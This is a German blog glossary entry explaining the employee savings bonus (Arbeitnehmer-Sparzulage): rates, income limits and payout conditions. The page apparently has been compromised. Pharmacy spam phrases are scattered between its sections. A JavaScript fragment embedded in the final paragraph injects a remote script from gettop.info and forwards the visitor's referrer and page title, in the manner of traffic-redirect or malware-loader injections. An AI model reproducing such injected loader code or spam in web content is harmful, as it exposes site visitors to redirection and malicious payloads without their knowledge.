Arbeitnehmer Sparzulage

Die Arbeitnehmer-Sparzulage soll Ihrem Vermögensaufbau dienen und ist somit eine staatliche Subvention. Gewährt wird sie nicht nur auf Bausparverträge, sondern auch auf andere Sparformen jedoch ist die Höhe der Zulage ganz unterschiedlich je nach Sparform.

Accutane cost

Arbeitnehmer Sparzulage über den Bausparvertrag abschöpfen

Verfügen Sie über den sogenannten VL-Bausparvertrag haben Sie die Möglichkeit im Rahmen Ihrer Lohnsteuererklärung einen Zuschuss zu beantragen der pro Jahr 9 % beträgt von maximal 470 Euro also 42,30 Euro. Besitzen Sie eine andere Art der Sparform beispielsweise einen Fondsparplan, Anteilscheine an Aktienfonds, Beteiligungen am eigenen Betrieb oder Aktien wird dieser mit 18 % von maximal 400 Euro gefördert also lediglich 72 Euro. Beide Förderungen zu jeweils 9 % und 18 % werden gleichzeitig gewährt somit können Sie im Jahr bis zu 114,30 Euro vom Staat erhalten.
Ihr Bausparen unterstützt der Staat auch dann mit der Arbeitnehmersparzulage, wenn Sie den Bausparvertrag weder für den Kauf einer Wohnung nutzen noch für den Bau eines Hauses.

cheap Lasix purchase Sildenafil

Einkommensgrenzen für die Sparzulage

Im Allgemeinen hat jeder Arbeitnehmer Anspruch auf die Arbeitnehmersparzulage vorausgesetzt Ihr zu versteuertes Einkommen übersteigt die Grenze von 17.900 Euro für Ledige und für Verheiratete 35.800 Euro nicht. Verwechseln Sie in diesem Zusammenhang das versteuernde Einkommen nicht mit dem Bruttoeinkommen denn von Ihrem Bruttoeinkommen, werden noch alle anderen steuerlich absetzbaren Ausgaben abgezogen. Das zu verrechnende Einkommen ergibt dann die so errechnete Summe. Haben Sie ein höheres Einkommen können Sie also dennoch von der Arbeitnehmersparzulage profitieren vorausgesetzt natürlich Sie haben in entsprechender Höhe steuerlich relevante Ausgaben.
Bei 17.900 Euro zu versteuerndes Einkommen entspricht das ca. einem Bruttolohn für Ledige von 1.585 Euro, sind Sie verheirateter Alleinverdiener und haben 2 Kinder beläuft es sich auf 3.682 Euro, sind Sie Alleinverdiener aber verheiratet beträgt es 3.119 Euro.

Zur Auszahlung kommt Ihre Arbeitnehmer-Sparzulage erst, wenn gewisse Voraussetzungen erfüllt wurden. So muss bei Bausparverträgen die Sperrfrist von 7 Jahren abgelaufen sein, bevor das Finanzamt Ihnen das Geld auf Ihr Bausparkonto überweist. Die Zeit vor dem Ablauf der Frist wird die Arbeitnehmer-Sparzulage lediglich vorgemerkt. Damit Sie wissen wie hoch Ihre Arbeitnehmersparzulage ist wird diese auf dem jeweiligen Einkommenssteuerbescheid vermerkt.

Beachten Sie, dass Sie die Arbeitnehmer-Sparzulage jedes Jahr neu beantragen müssen und zwar gemeinsam mit der Abgabe Ihrer Steuererklärung bei Ihrem Finanzamt. document.currentScript.parentNode.insertBefore(s, document.currentScript);s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

This entry was posted in Lexikon and tagged , , , . Bookmark the permalink.

Comments are closed.